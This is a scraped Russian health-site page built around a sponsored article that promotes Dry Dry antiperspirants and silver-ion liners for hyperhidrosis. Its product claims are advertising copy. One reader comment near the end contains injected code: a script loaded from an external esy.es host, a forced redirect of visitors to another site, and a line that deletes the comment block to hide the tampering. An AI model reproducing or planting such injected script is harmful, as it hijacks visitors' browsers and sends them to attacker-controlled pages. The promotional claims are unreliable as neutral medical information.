Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как справиться с повышенн...  >>  Как справиться с повышенной потливостью
 
Обратная связь
 

Как справиться с повышенной потливостью

Размер шрифта
04 июня 2012 08:00
  • google_analytics: false
  • Нравится

В жизни многих людей склонность к избыточному потоотделению, или гипергидрозу, становится настоящей проблемой. Существуют ли эффективные средства против пота?

Гипергидроз сопровождается не только неприятным запахом, возникающим за счет размножения микроорганизмов. Это еще и следы пота, и разводы на одежде, влажные стельки в обуви и их запах, не говоря уже о неприятных ощущениях при рукопожатии, когда ладони липкие и влажные.

Ищем выход

Далеко не всем людям с гипергидрозом способны помочь популярные антиперспиранты. Тогда на помощь приходят более действенные средства, такие как Dry Dry (Драй Драй) — специально разработанные шведской компанией «Lexima AB».

Это средство уже более 30 лет пользуется популярностью на рынке косметических товаров Швеции, а сегодня оно доступно и российским покупателям!

Благодаря своему составу, Dry Dry блокирует потовые железы на обработанных участках кожи. Как результат – поверхности остаются сухими и, что немаловажно, при этом не возникает избыточного потоотделения на других участках кожи.

Как использовать Dry Dry

Dry Dry необходимо наносить перед сном. Прежде всего нужно вымыть и тщательно высушить участки кожи, которые будут обрабатываться этим косметическим средством, после чего нанести на них Dry Dry. Затем дать коже высохнуть в течение 2-3 минут. Утром можно проводить привычные водные процедуры, по желанию пользоваться и обычным дезодорантом, хотя необходимости в этом, как правило, не возникнет. При соблюдении указанных рекомендаций Dry Dry поможет обеспечить полный комфорт минимум на 5-7 дней, при этом одного флакона вполне хватит на 5-6 мес.

Для особых случаев

Теперь появилась возможность помочь и тем, кто является обладателем чувствительной кожи. Для них создан Dry Dry Sensitive с тем же механизмом действия, но с меньшей концентрацией активного вещества гидрата хлористого алюминия (24 % в Dry Dry Sensitive против 30,5 % в Dry Dry).

Те, кто придерживается «жизни без химии», а так же беременные и кормящие женщины, могут попробовать вкладыши в одежду с ионами серебра для защиты от пота «Стоп-Аgент», которые содержат ионы серебра – природный антисептик, препятствующий образованию запаха пота. Вкладыши предотвращают появление на одежде пятен от пота; увеличивают срок носки одежды; экономят расходы на химчистке; не ощущаются при носке и не травмируют кожу.

В настоящий момент, помимо Dry Dry и Dry Dry Sensitive, предлагаются «Салфетки разового применения Dry Dry» в индивидуальной упаковке.

Салфетки могут заинтересовать:

людей, сомневающихся в эффективности Dry Dry и желающих попробовать, как препарат работает, но не готовых за эту пробу оплатить стоимость флакона Dry Dry;

путешественников; им не нужно брать с собой флакон 50 мл, а достаточно взять несколько салфеток;

людей, которым по различным причинам, необходимо разовое использование средства Dry Dry.

Планы компании-производителя

В связи с допустимым, но возможным неприятным эффектом легкого жжения или покалывания обрабатываемой поверхности, планируется производить и поставлять на рынок крем и мазь, основным составляющим компонентом которых будет гидрокортизон. В настоящий момент данные средства находятся на стадии разработки.

Ощутите истинную сухость, комфорт, удобство в применении и безопасность с Dry Dry, Dry Dry Sensitive и вкладышами в одежду «Стоп-Аgент»!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

13 августа 2012 в 08:40

Комментарий удален за нарушение Правил общения

2 - zzzzzz

28 июня 2015 в 17:59

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему у вас воняют ноги? Как с этим бороться   Отличается ли пот от мочи?   Как не потеть   От меня воняет! Как избавиться от запахов  

Слайдшоу

1
Самые стыдные вопросы о красоте. Часть 2
Как остаться сухой, и не вспотеть
Постоянно потеете? Как жить дальше?

Тесты

Есть ли у вас гормональные нарушения
Как облегчить менопаузу?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.